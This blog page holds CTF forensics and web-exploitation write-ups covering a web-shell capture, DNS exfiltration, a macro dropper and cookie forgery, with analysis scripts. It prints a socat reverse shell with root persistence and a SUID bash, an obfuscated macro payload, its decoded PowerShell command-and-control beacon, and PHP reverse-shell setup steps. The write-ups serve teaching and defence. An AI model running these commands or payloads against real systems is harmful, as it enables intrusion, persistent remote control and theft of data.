
HTB – Hack The Boo Forensic Writeups

I had a bit of time to play with the latest Hack The Box CTF, Hack The Boo. It was mostly aimed at a beginner audience but still had interesting challenges. I mostly focused on the first three forensic challenges this time.

Wrong Spooky Season

“I told them it was too soon and in the wrong season to deploy such a website, but they assured me that theming it properly would be enough to stop the ghosts from haunting us. I was wrong.” Now there is an internal breach in the Spooky Network and you need to find out what happened. Analyze the network traffic and find out how the scary ghosts got in and what they did.

Challenge Introduction

The challenge provided a .pcap file. Opening it up in Wireshark for inspection, we notice that it mostly contains HTTP traffic.

Most of that traffic was just images, HTML, CSS and JavaScript. The files can be exported pretty easily:

File -> Export Objects -> HTTP

Most of them were not suspicious. Three of them gave a hint of what had been happening though:


It looked like there was a command injection vulnerability: a .jsp file that takes a cmd parameter and executes it on the server, in other words a web shell.

We were able to find further requests to that file in the PCAP:

GET /e4d1c32a56ca15b3.jsp?cmd=socat%20TCP:
Screenshot: Wireshark with the mentioned request

It looked like the attacker had used socat to start a reverse shell, connecting back to a listener on their own host. This gave us more to look for: from here on the session runs over that TCP connection rather than over HTTP, so following the TCP stream is the way to see what they typed.

In the packets below we could see them issuing a few commands to get the lay of the land, like checking the kernel version with uname -r, reading the passwd file or searching for GTFOBins.

Eventually we see them issuing:

echo 'socat TCP: EXEC:sh' > /root/.bashrc && echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS" | rev > /dev/null && chmod +s /bin/bash

Reversing the string and Base64-decoding it (for example in CyberChef) ==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS gives us the flag. Note that the reversed output goes to /dev/null, so the string never did anything on the box; it was only planted for us to find. The parts that do matter are the .bashrc entry (a new shell for root every time they log in) and chmod +s /bin/bash (a SUID shell for any local user).
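To turn the manual Wireshark digging into something repeatable, here is an added example (not code from the challenge or the original post) that does the same triage in Python: it pulls the cmd= values out of webshell requests as tshark would list them, tags the commands seen in the reverse-shell stream with the indicators found above, and undoes the echo ... | rev trick. The sample request list and the early shell commands are constructed stand-ins; only the webshell path, the truncated socat request and the persistence line are taken from the post.

```python
import base64
import re
from urllib.parse import parse_qs, urlsplit

WEBSHELL = "/e4d1c32a56ca15b3.jsp"

# Constructed sample of request URIs, in the form that
#   tshark -nr capture.pcap -Y http.request -T fields -e http.request.uri
# prints them. The webshell path and the truncated socat request are the ones
# quoted in the post; the "id" request is a stand-in, not from the capture.
SAMPLE_URIS = [
    "/index.html",
    WEBSHELL + "?cmd=id",
    WEBSHELL + "?cmd=socat%20TCP:",
]

# Constructed sample of the attacker's side of the reverse-shell TCP stream
# (Wireshark: Follow TCP Stream). Only the last line is quoted from the post,
# with the socat target left out exactly as it is there.
SAMPLE_SHELL_LINES = [
    "uname -r",
    "cat /etc/passwd",
    "echo 'socat TCP: EXEC:sh' > /root/.bashrc && "
    'echo "==gC9FSI5tGMwA3cfRjd0o2Xz0GNjNjYfR3c1p2Xn5WMyBXNfRjd0o2eCRFS" | rev > /dev/null && '
    "chmod +s /bin/bash",
]

REV_B64 = re.compile(r'echo\s+"([A-Za-z0-9+/=]+)"\s*\|\s*rev')


def webshell_commands(uris, path=WEBSHELL):
    """URL-decoded cmd= values of every request to the webshell, in capture order."""
    cmds = []
    for uri in uris:
        parts = urlsplit(uri)
        if parts.path == path:
            cmds.extend(parse_qs(parts.query).get("cmd", []))
    return cmds


def decode_reversed_base64(blob):
    """Undo the 'echo ... | rev' trick: reverse the text, then Base64-decode it."""
    return base64.b64decode(blob[::-1]).decode()


def triage(cmd):
    """Tag one shell command with the indicators found in this challenge."""
    tags = {
        "reverse_shell": "socat" in cmd and "EXEC:" in cmd,
        "bashrc_persistence": ".bashrc" in cmd and ">" in cmd,
        "suid_bash": re.search(r"chmod\s+\+s\s+/bin/bash", cmd) is not None,
        "hidden_text": None,
    }
    m = REV_B64.search(cmd)
    if m:
        try:
            # The reversed output went to /dev/null on the box, so it never
            # ran anywhere; decoding it is purely for the analyst.
            tags["hidden_text"] = decode_reversed_base64(m.group(1)).strip()
        except (ValueError, UnicodeDecodeError):
            tags["hidden_text"] = "<not valid base64>"
    return tags


if __name__ == "__main__":
    print("webshell commands:", webshell_commands(SAMPLE_URIS))
    for line in SAMPLE_SHELL_LINES:
        print(line[:40].ljust(40), triage(line))
```

Run it as-is and the last line of the sample stream lights up all three indicators plus the decoded text; swap SAMPLE_URIS for the real tshark output (one URI per line) to get the full list of commands the attacker sent through the web shell before switching to the reverse shell.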


Trick or Breach

Our company has been working on a secret project for almost a year. No one knows about the subject, although rumor is that it is about an old Halloween legend where an old witch in the woods invented a potion to bring pumpkins to life, but in a more up-to-date approach. Unfortunately, we learned that malicious actors accessed our network in a massive cyber attack. Our security team found that the hack had occurred when a group of children came into the office’s security external room for trick or treat. One of the children was found to be a paid actor and managed to insert a USB into one of the security personnel’s computers, which allowed the hackers to gain access to the company’s systems. We only have a network capture during the time of the incident. Can you find out if they stole the secret project?

Challenge Introduction

As in the previous challenge we were provided with a .pcap file.

Looking at it in Wireshark it becomes clear that there is only DNS traffic: a large number of alphanumeric subdomains are being queried.

Screenshot: Wireshark with the DNS Requests

This very much looks like data exfiltration via DNS.

With tshark -nr capture.pcap -Y "dns.flags.response == 0" we get a list of all DNS requests (adding -T fields -e dns.qry.name prints only the queried names, one per line).

We could use pipes and command-line tools like cut to extract just the domains. I was lazy and did it in Sublime with multi-line editing.

After that we had to strip the fixed domain suffix as well as the line breaks, so that only the hex data in the subdomain labels remained, in the order it was captured.

After that we had to decode it from hex, which I did in Cyberchef.

Screenshot: Cyberchef decoding the data from hex

Pieces of the output like /drawings/drawing1.xml or xl/worksheets/sheet1.xml suggest that this was an MS Excel file (an .xlsx is a zip archive of XML parts, which is why those paths show up, and the decoded bytes start with the zip signature PK). So we downloaded the decoded output and saved it as an .xlsx file. It could then be opened in an office program (in my case LibreOffice) and we get to see the flag.

Screenshot: the exfiltrated document opened in LibreOffice
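The CyberChef steps above are fine for one capture, but the same reassembly is easy to script. The following is an added example, not from the challenge or the original post: it models the exfil side (hex-encode, chop into labels that fit the 63-byte DNS label limit) only so that it has realistic queries to work on, then reassembles them the way the post did and checks the result for an Office file. The domain name, the payload bytes and the retry handling are assumptions; the real capture's zone name is not given in the post.

```python
EXFIL_DOMAIN = "example.invalid"  # assumed; the real zone name is not in the post

# Constructed payload: not a real spreadsheet, just the zip local-header
# signature plus the member names the post saw, so detection has something to hit.
SAMPLE_PAYLOAD = (
    b"PK\x03\x04" + b"\x14\x00\x00\x00\x08\x00"
    + b"xl/worksheets/sheet1.xml" + b"<sheetData/>"
    + b"xl/drawings/drawing1.xml" + b"PK\x05\x06"
)


def split_for_dns(payload, domain=EXFIL_DOMAIN, label_len=60):
    """Exfil side: hex-encode and cut into labels no longer than 63 characters."""
    hexdata = payload.hex()
    chunks = [hexdata[i:i + label_len] for i in range(0, len(hexdata), label_len)]
    return [f"{chunk}.{domain}" for chunk in chunks]


def reassemble(qnames, domain=EXFIL_DOMAIN, drop_retries=True):
    """Analyst side: keep capture order, drop the suffix, join the labels, unhex.

    Queries for other domains are ignored. A resolver that retries sends the
    exact same name twice in a row; drop_retries removes such immediate repeats,
    at the cost of also removing a genuinely repeated chunk (rare for hex data)."""
    suffix = "." + domain
    hexparts, last = [], None
    for name in qnames:
        name = name.rstrip(".")
        if not name.endswith(suffix):
            continue
        if drop_retries and name == last:
            continue
        last = name
        hexparts.append(name[:-len(suffix)].replace(".", ""))
    return bytes.fromhex("".join(hexparts))


def sniff_type(data):
    """Cheap file-type check: OOXML documents are zip files with telltale member paths."""
    if not data.startswith(b"PK\x03\x04"):
        return "unknown"
    if b"xl/" in data:
        return "xlsx (OOXML zip)"
    if b"word/" in data:
        return "docx (OOXML zip)"
    return "zip"


if __name__ == "__main__":
    queries = split_for_dns(SAMPLE_PAYLOAD)
    print("\n".join(queries))
    data = reassemble(queries)
    print(sniff_type(data), data == SAMPLE_PAYLOAD)
```

To use it on the real capture, feed reassemble() the names from tshark -nr capture.pcap -Y "dns.flags.response == 0" -T fields -e dns.qry.name with the right domain, write the returned bytes to a file and check the type before renaming it to .xlsx.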

Halloween Invitation

An email notification pops up. It’s from your theater group. Someone decided to throw a party. The invitation looks awesome, but there is something suspicious about this document. Maybe you should take a look before you rent your banana costume.

Challenge Introduction

This time we were presented with a .docm file. Opening it up in LibreOffice we were presented with a warning that the macros had been disabled for security reasons.

So we looked at the macros and found obfuscated code. The main block built a command string that would then be run, but its parts were encoded.

Screenshot: beginning of the macro in the LibreOffice macro editor

We could now extract the values and decode them in a tool like CyberChef. I went a different route and copied the main part and the functions called within it and converted it into a Python script that prints the decoded string.

from textwrap import wrap


# The two function names are the obfuscated ones from the macro, kept so the
# copied data lines below work unchanged.
def uxdufnkjlialsyp(data):
    # First layer: a hex string, two characters per byte, back to text.
    return "".join(chr(int(pair, 16)) for pair in wrap(data, 2))


def wdysllqkgsbzs(data):
    # Second layer: space-separated decimal character codes back to text.
    return "".join(chr(int(number)) for number in data.split(" "))

firstVar = ""
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3734203635203636203132322036352036382034382036352037342031") + uxdufnkjlialsyp("31392036352035312036352036382039392036352037362031303320363520353120363520363820383120363520373620313033"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520313230203635203638203130") + uxdufnkjlialsyp("37203635203739203635203635203131372036352036382038352036352037372031303320363520353420363520363820313033203635203737203635203635203532"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3635203638203635203635203734") + uxdufnkjlialsyp("20313139203635203535203635203637203831203635203937203831203635203537203635203637203939203635203930203635203635203438203635203638203737"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3635203839203130332036362031303620363520373120373720363520373820313033203636203130372036352036") + uxdufnkjlialsyp("37203438203635203737203635203635203438203635203638203737203635203930"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203132312036352036382038312036352037372036352036352035") + uxdufnkjlialsyp("33203635203637203438203635203738203131392036362031303820363520373120363920363520373720313033203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("313232203635203731203639203635203737203130332036362031303620363520363720393920363520373920313139203635203130372036352037322036352036352038302038312036352031") + uxdufnkjlialsyp("3130203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("373120313033203635203130302036352036362034382036352037322036352036352037392031303320") + uxdufnkjlialsyp("36352031313820363520363720353620363520373420313139203635203535203635203637203831"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("36352031303020313033203635203537203635203639203130372036352039382031303320363620353020363520373120353620363520393720313139203636203130382036352036372034") + uxdufnkjlialsyp("38203635203835"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("31303320363620313038203635203732203737203635203130302036352036362037382036352037312038352036352031303020363520363620313131203635203731203536203635203930") + uxdufnkjlialsyp("203635203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("313033203635203637203438203635203836203831203636203132322036352037312038") + uxdufnkjlialsyp("35203635203831203130332036362031303420363520373220373720363520393720383120363620313036203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("373020363520363520383920383120363620313231203635203732203737203635203937203831203636") + uxdufnkjlialsyp("2031313720363520373120393920363520373320363520363520313136203635203730203835203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3939203130332036362031313220363520363720363520363520373420363520363620313139203635203637203831203635203939203131392036352031313820") + uxdufnkjlialsyp("3635203731203831203635203738203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520313232203635203731203733203635") + uxdufnkjlialsyp("20383920313139203636203130362036352036382038392036352039302036352036352031303320363520363720343820363520383320363520363620313038"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("36352037312036392036352039302036352036362031303820363520373220373320363520393920313139203635") + uxdufnkjlialsyp("20313033203635203639203635203635203130312031313920363520313035203635203639"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363920363520313030203831203636203438203635203731203130332036352039") + uxdufnkjlialsyp("38203131392036362031323120363520373120313037203635203130312031303320363620313034203635203732203831"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520393720383120363620") + uxdufnkjlialsyp("313138203635203731203532203635203733203130332036352035372036352036372038312036352039372038312036362035372036352036382031313520363520313030"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("313139203636203131312036352037312031303720363520393820363520363620313038") + uxdufnkjlialsyp("2036352036372036352036352037352036352036352031303720363520373220383120363520393920313033203636"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("34392036352037312038352036352037352038312036362035352036352036372038312036352038392031313920363520353720363520363720313033203635203833203831203636203131") + uxdufnkjlialsyp("37203635203732"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("38392036352039382031313920363620313134203635203731203835203635203736203831203636203833") + uxdufnkjlialsyp("20363520373120383520363520393920313139203636203438203635203639203438203635203930"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("38312036362034382036352037312031303320363520393820313139203636203130372036352036372036352036352037362038312036362038362036352037322037") + uxdufnkjlialsyp("37203635203930203831203636203637"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520373120363920363520393920313139203636203131322036352037312037372036352038352036352036362031303420363520") + uxdufnkjlialsyp("37322037332036352039392031313920363620313132203635203731"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("35322036352039302031313920363520313033203635203637203438203635203836203831203636203132312036352037312031303720363520373320363520363520313037203635203732203635") + uxdufnkjlialsyp("203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("37342036352036362031323220363520363720") + uxdufnkjlialsyp("35362036352037372036352036352034382036352036382037372036352039302031303320363520313231203635203638203831203635203737203635203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("353320363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635") + uxdufnkjlialsyp("2037312038352036352039392031303320363620313232203635203637"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352038312036352036362035352036352036372037332036352038") + uxdufnkjlialsyp("3120383120363620343920363520373220383120363520393720363520363620313138203635203732203733203635203937"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("383120363620353420363520373120363920363520") + uxdufnkjlialsyp("313030203635203636203131322036352037312035362036352039382031303320363520313035203635203638203438203635203734203635203636"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("31313220363520373220343820363520") + uxdufnkjlialsyp("37352038312036352035352036352037312031303720363520393020313033203635203130332036352036372031303320363520373420363520363620313036203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3637") + uxdufnkjlialsyp("20363520363520373620383120363620313137203635203731203835203635203733203635203635203131302036352036392035322036352039382031313920363620313137203635203731203835"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520373420313139203635203131322036352036372036352036352031303120313139203635203130372036352037322037332036352038302038312036362031313220363520") + uxdufnkjlialsyp("373120383520363520313031"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("36352036352031303320") + uxdufnkjlialsyp("363520363720383120363520383920313139203635203130332036352036372034382036352038322038312036362031323120363520373220373320363520393820313139203636"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352036392036392036352038392031313920363620343820363520373120313037203635203938203131392036362031313720363520") + uxdufnkjlialsyp("363720363520363520383520313139203636203438203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3731203536203635203939203635203635203130332036352036372034382036352038322038312036362031323120") + uxdufnkjlialsyp("36352037322037332036352039382031313920363620313231203635203730203839"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520383920383120363620313231203635203731203130372036352038392038") + uxdufnkjlialsyp("31203636203130352036352037312031313920363520393020383120363520313033203635203731203835203635203739"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036352031303720363520373220373320363520383020383120") + uxdufnkjlialsyp("3636203830203635203732203835203635203130302036352036352031313620363520373020373720363520313030203635203636"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3132312036352037") + uxdufnkjlialsyp("31203130372036352039382031303320363620313130203635203637203635203635203736203831203636203734203635203731203532203635203939203635203636203439203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("37322038312036352038342031313920363620313035203635203731203131312036352039302038312036362031303620363520373220383120363520373320363520363520313037203635203732") + uxdufnkjlialsyp("203733"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3635203739203131392036352031303720363520373220383120363520383020383120363620") + uxdufnkjlialsyp("373420363520373120353220363520313030203130332036362031313820363520373120313135203635203930"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("38312036352031313620363520373020373320363520393020383120363620313232203635203732203831203635203834203831203636203130") + uxdufnkjlialsyp("3820363520373220383120363520393720363520363620313138"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3635203731203831203635203733") + uxdufnkjlialsyp("20363520363520313136203635203730203835203635203939203130332036362031313220363520363720363520363520373420363520363620313139203635203637"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3831203635203939203131392036352031313820363520363820393920363520393020383120363620313034203635203638203733203635203737203131392036362031303420363520363820373320") + uxdufnkjlialsyp("3635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("38392031313920363520313033203635203637203438203635203834203831203636203130382036352037322038312036352039372036352036362031313820363520373120") + uxdufnkjlialsyp("3831203635203733203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363620383120") + uxdufnkjlialsyp("36352036392035362036352038352031313920363620383520363520363720363520363520373620383120363620373320363520373120383520363520383920383120363620313037203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("37312038352036352039392031303320363620313232203635203637203635203635203831203635203636203535") + uxdufnkjlialsyp("203635203637203733203635203831203831203636203439203635203732203831203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3937203635203636203131382036352037322037332036352039372038312036362035342036352037312036392036352031303020363520363620313132203635203731203536203635203938") + uxdufnkjlialsyp("20313033"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3635203130352036352036382034382036352037342036352036362031313220363520373220343820363520373320363520363520") + uxdufnkjlialsyp("3131362036352036392037332036352039382031313920363620313037"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520373220") + uxdufnkjlialsyp("3130372036352037332036352036352031313120363520373020313135203635203835203131392036362035332036352037322037372036352031303020363520363620313038203635203731"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3438203635") + uxdufnkjlialsyp("203736203130332036362038352036352037312038352036352031303120363520363620343820363520363720353220363520383220383120363620313137203635203731203737203635203938"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3131392036362031303720363520373120313037203635203938203130332036362031313020363520373020343820363520373920313033203635203534203635203730203835203635") + uxdufnkjlialsyp("203836203635203636"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("37312036352036382031303320363520373620313033203636203732203635203731") + uxdufnkjlialsyp("20383520363520313030203635203636203637203635203732203130372036352031303020363520363620313038203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("3732203737203635203735203635203635203130372036352037312038352036352037352031313920363520313037203635203732203733203635203735203831203635") + uxdufnkjlialsyp("20313033203635203637203438"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("36352039372031303320363620") + uxdufnkjlialsyp("3131382036352037312031303720363520393820313033203635203130332036352036372039392036352037332036352036352031313020363520363720313037203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("313032") + uxdufnkjlialsyp("20383120363520313033203635203732203737203635203938203635203636203130382036352037312038352036352039392036352036352031303320363520363820363520363520373620313033"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("363520353220363520373220343820363520383320363520363620") + uxdufnkjlialsyp("3835203635203639203733203635203130312031313920363520343920363520373220383520363520393920363520363520313232203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("373220373320363520383820313139203635203132322036352036382038312036352037382038") + uxdufnkjlialsyp("31203636203533203635203730203536203635203938203831203635203438203635203731203737203635"))
firstVar = firstVar + wdysllqkgsbzs(uxdufnkjlialsyp("393920313033203635203131392036352036382038352036352031303220383120") + uxdufnkjlialsyp("3635203631"))
result = firstVar  # the Base64 blob the macro builds
print(result)

The hex strings decode to space-separated decimal character codes, and those decode again to text. Running the script gave us a Base64-encoded string.


Decoding that gave us the command with every character separated by dots. Those dots are null bytes: the command is stored as UTF-16LE, which is what PowerShell's -EncodedCommand expects, so decoding the Base64 as UTF-16LE instead of plain text gives the clean script. Read past the dots and it looks like this:

$.s.=.'.7.7…7.4…1.9.8…5.2.:.'.;.$.i.=.'.d.4.3.b.c.c.6.d.-.0.4.3.f.'.;.$.p.=.'.h.t.t.p.:././.'.;.$.v.=.I.n.v.o.k.e.-.R.e.s.t.M.e.t.h.o.d. .-.U.s.e.B.a.s.i.c.P.a.r.s.i.n.g. .-.U.r.i. .$.p.$.s./.d.4.3.b.c.c.6.d. .-.H.e.a.d.e.r.s. .@.{.".A.u.t.h.o.r.i.z.a.t.i.o.n.".=.$.i.}.;.w.h.i.l.e. .(.$.t.r.u.e.).{.$.c.=.(.I.n.v.o.k.e.-.R.e.s.t.M.e.t.h.o.d. .-.U.s.e.B.a.s.i.c.P.a.r.s.i.n.g. .-.U.r.i. .$.p.$.s./.0.4.3.f. .-.H.e.a.d.e.r.s. .@.{.".A.u.t.h.o.r.i.z.a.t.i.o.n.".=.$.i.}.).;.i.f. .(.$.c. .-.n.e. .'.N.o.n.e.'.). .{.$.r.=.i.e.x. .$.c. .-.E.r.r.o.r.A.c.t.i.o.n. .S.t.o.p. .-.E.r.r.o.r.V.a.r.i.a.b.l.e. .e.;.$.r.=.O.u.t.-.S.t.r.i.n.g. .-.I.n.p.u.t.O.b.j.e.c.t. .$.r.;.$.t.=.I.n.v.o.k.e.-.R.e.s.t.M.e.t.h.o.d. .-.U.r.i. .$.p.$.s./.7.e.a.2.3.a.2.c. .-.M.e.t.h.o.d. .P.O.S.T. .-.H.e.a.d.e.r.s. .@.{.".A.u.t.h.o.r.i.z.a.t.i.o.n.".=.$.i.}. .-.B.o.d.y. .(.[.S.y.s.t.e.m…T.e.x.t…E.n.c.o.d.i.n.g.].:.:.U.T.F.8…G.e.t.B.y.t.e.s.(.$.e.+.$.r.). .-.j.o.i.n. .'. .'.).}. .s.l.e.e.p. .0…8.}.H.T.B.{.5.u.p.3.r..3.4.5.y..m.4.c.r.0.5.}.

At the end you can already see the flag.
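The dotted text is worth understanding properly, because every PowerShell -EncodedCommand stager looks like that when decoded with the wrong charset. Here is an added example (not code from the macro or the original post) that builds a constructed stager of the same shape, shows the dotted rendering you get from a byte-wise decode next to the proper UTF-16LE decode, and tags the behaviours that make the decoded script suspicious. The host name, path and command text are made up for the demo.

```python
import base64
import re

# Constructed stand-in for the stager the macro decoded. It keeps the shape of
# the real one (fetch, conditional iex, loop, sleep) but the host name and
# paths are made up; nothing here is taken verbatim from the challenge.
SAMPLE_CMD = (
    "$s='c2.example.invalid';$p='http://';"
    "while($true){$c=(Invoke-RestMethod -UseBasicParsing -Uri $p$s/task);"
    "if($c -ne 'None'){$r=iex $c};sleep 0.8}"
)

IOC_PATTERNS = {
    "remote_fetch": r"Invoke-RestMethod|Invoke-WebRequest|DownloadString|Net\.WebClient",
    "dynamic_exec": r"\biex\b|Invoke-Expression",
    "beacon_loop": r"while\s*\(\s*\$true\s*\)",
}


def encode_powershell(cmd):
    """What a dropper does: UTF-16LE text, then Base64, ready for -EncodedCommand."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_powershell(b64):
    """The matching decode. Using any single-byte charset here is what produces the dots."""
    return base64.b64decode(b64).decode("utf-16-le")


def naive_render(b64):
    """Decode byte by byte and show non-printables as dots: every other character
    becomes '.', because the high byte of each UTF-16LE code unit is zero."""
    raw = base64.b64decode(b64)
    return "".join(chr(b) if 32 <= b < 127 else "." for b in raw)


def indicators(script):
    """Which of the stager behaviours above show up in a decoded script, sorted by name."""
    return sorted(name for name, pat in IOC_PATTERNS.items()
                  if re.search(pat, script, re.IGNORECASE))


if __name__ == "__main__":
    blob = encode_powershell(SAMPLE_CMD)
    print(naive_render(blob)[:60], "...")
    print(decode_powershell(blob))
    print(indicators(decode_powershell(blob)))
```

Paste the Base64 string your own run of the macro script prints into decode_powershell() and you get the command without the dots; the three indicators (fetch from a remote host, execute whatever comes back, loop forever) are the shape of a command-and-control beacon and are what you would report, regardless of the flag at the end.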

TryHackMe – Advent of Cyber 2 Day 1-6 – Web Exploitation [Writeup]

Advent of Cyber 2 is a free, holiday-season-themed room on TryHackMe; all you need to get started is an account.

A new challenge is released every day and I will update this blog post after I have completed the next day.

Day 1 – A Christmas Crisis

Deploy the attack machine and the challenge by clicking the green buttons. Then open the browser of the attack box and enter the IP of the deployed challenge box.

Create a user by typing in a username and password and clicking register, then log in.

Open the browser's developer tools with Ctrl-Shift-I and navigate to the storage (data) panel. Here you can see the cookie name and value.

Looking at the value you may recognise the encoding from experience. If you have no idea, pull up CyberChef, paste in the value and try out a few of the favourites.

Hint: the answer is the full name of the encoding, not just the three letter short handle.

For my username of foobar the cookie decodes to:

{"company":"The Best Festival Company", "username":"foobar"}

This is JSON. (Sorry, no idea how to be less obvious about it.)

To get Santa’s cookie, we now need to change the username in the JSON to santa and hex-encode that JSON again. You can do that in CyberChef as well; make sure to select a delimiter of None. This works because the cookie is plain encoded data with no signature: the server trusts whatever the client sends back.

Now we go back to the assembly line website and our developer tools. We replace the value of the auth cookie with what we just calculated, then reload the page.

Now we can turn on the assembly line again and when all switches are flipped on, the final flag is revealed.
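For anyone who wants to see the same thing in code rather than in CyberChef, here is an added example (not from the room or the original post): it decodes and forges the hex/JSON auth cookie exactly as done above, and next to it shows the fix the challenge is really about, a cookie carrying an HMAC tag so that an edited payload is rejected. The foobar cookie is constructed from the decoded value shown above; the signed design and its key are assumptions, not the challenge's code.

```python
import hashlib
import hmac
import json
import secrets

# Constructed cookie for the user "foobar", laid out the way the decoded value
# looked in the room: JSON, hex-encoded with no delimiter.
FOOBAR_COOKIE = '{"company":"The Best Festival Company", "username":"foobar"}'.encode().hex()


def decode_cookie(hex_value):
    return json.loads(bytes.fromhex(hex_value).decode())


def forge_cookie(hex_value, username):
    """What we did by hand in CyberChef: edit the username, hex-encode again."""
    data = decode_cookie(hex_value)
    data["username"] = username
    return json.dumps(data).encode().hex()


# Hardened version (an assumed design, not the challenge's code): the same
# payload plus an HMAC over it under a key only the server knows.
SERVER_KEY = secrets.token_bytes(32)  # fresh per run here; a real server keeps one stable secret


def sign_cookie(data, key=SERVER_KEY):
    payload = json.dumps(data, separators=(",", ":")).encode().hex()
    tag = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    return payload + "." + tag


def verify_cookie(value, key=SERVER_KEY):
    """Return the cookie data if the tag checks out, else None (treat as logged out)."""
    payload, _, tag = value.rpartition(".")
    expected = hmac.new(key, payload.encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, tag):
        return None
    return json.loads(bytes.fromhex(payload).decode())


if __name__ == "__main__":
    santa = forge_cookie(FOOBAR_COOKIE, "santa")
    print("forged:", santa, decode_cookie(santa))
    signed = sign_cookie(decode_cookie(FOOBAR_COOKIE))
    payload, tag = signed.split(".")
    tampered = forge_cookie(payload, "santa") + "." + tag
    print("tampered signed cookie accepted?", verify_cookie(tampered) is not None)
```

The forged value is what you paste into the auth cookie in the developer tools. With the signed variant the same edit fails verification, because the attacker cannot recompute the tag without SERVER_KEY; a session ID looked up server-side would work just as well and keeps the username out of the client entirely.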

Day 2 – The Elf Strikes Back!

As always we start with deploying both the attack box and the challenge server.

First we bring up the IP of the challenge in our browser. The website pretty much tells us what to do next. We add ?id=YOUR_ID_HERE to the URL and replace YOUR_ID_HERE with the code provided in the challenge description.

This leads us to the upload page.

Checking the file types in the upload dialog or the source code reveals that the website accepts .jpeg, .jpg and .png files, all common image formats.

The Walk-through / challenge asks us now to upload a reverse shell. The briefing even tells us what reverse shell.

But let us quickly talk about how we can find out what kind of reverse shell we should try. First we need to know which programming language the server runs. If we are lucky, like in this case, we get that information from an HTTP response header.

To view the header, we open up the developer tools again and head to the network tab. After a reload of the page, it should populate. We click on the main file, the one with our id, then select headers on the right panel. Scrolling through the headers we can find X-Powered-By: PHP/7.2.24

This tells us we are looking for a PHP reverse shell, just as suggested in the challenge.

As suggested in the guide, we copy the reverse shell to our working directory with cp /usr/share/webshells/php/php-reverse-shell.php . in the terminal. Then we run subl php-reverse-shell.php to open the reverse shell code in Sublime Text.

Now we change line 49 and replace the placeholder with the IP of our attack box. We can find that IP right at the top of the TryHackMe page. We also change the port in line 50 to the suggested 4444. As long as we use a free, high-numbered port we can choose whatever we like here; we just have to use the same port when setting up the listener in the next step.

After saving the file we switch back to the terminal and set up a netcat listener with sudo nc -lvnp 4444

Netcat is a tool that lets us listen for and send network traffic. Strictly speaking only ports below 1024 need root privileges; a normal user can open 4444, so the sudo is just following the guide.

